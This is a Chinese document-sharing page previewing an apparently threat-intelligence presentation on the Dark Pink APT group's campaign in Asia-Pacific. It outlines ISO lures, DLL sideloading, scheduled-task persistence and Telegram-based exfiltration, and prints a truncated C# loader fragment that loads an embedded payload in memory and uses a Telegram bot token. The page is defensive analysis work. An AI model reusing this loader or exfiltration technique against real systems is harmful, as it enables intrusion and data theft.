揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析

3.0 2025-05-10 23 0 2033 KB 27 页 VIP免费 PDF
侵权投诉
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
摘要:

Unveiling Dark Pink:An In-Depth Analysis of APAC’s Covert APT ThreatOUTLINEDark Pink’s latest campaignTelegram Exfiltration and C2 demoTeleScoutDark Pink’s TTPsI GOT AN EMAIL!(Group-IB, 2023)ISO FILEISO FILESigned winword.exe sideloads wwlib.dllMalicious wwlib.dll sets up persistenceExtracts XOR encrypted payload from .doc lureDisplays .doc lureSets up scheduled taskSCHEDULED TASKMicrosoft Build Task saved in Temp folderName wct*.tmp relates to normal OneDrive activity public static void main() { string stealer_module = init_br(); string Telegram_Chat_ID = Encoding.Default.GetString(chat_id_numbers); var inputStream = new MemoryStream(main_payload); ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read); ZipArchiveEntry archEntry = archive.Entries[0]; Stream entryStream = archEntry.Open() var tmpMem = new MemoryStream(); entryStream.CopyTo(tmpMem); var xtmp = tmpMem.ToArray(); var memory_payload = Assembly.Load(xtmp); byte[] Telegram_BOT_API_token = Convert

展开>> 收起<<
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析

共 27 页,预览5页

还剩22页未读, 继续阅读

揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
揭开DarkPink的面纱对APAC隐蔽的APT威胁的深入分析
声明:企商查报告文库所有资源均是客户上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作商用。
属性:27 页 大小:2033 KB 格式:PDF 时间:2025-05-10

开通VIP享超值会员特权

  • 多端同步记录
  • 高速下载文档
  • 免费文档工具
  • 分享文档赚钱
  • 每日登录抽奖
  • 优质衍生服务
/ 3
客服
关注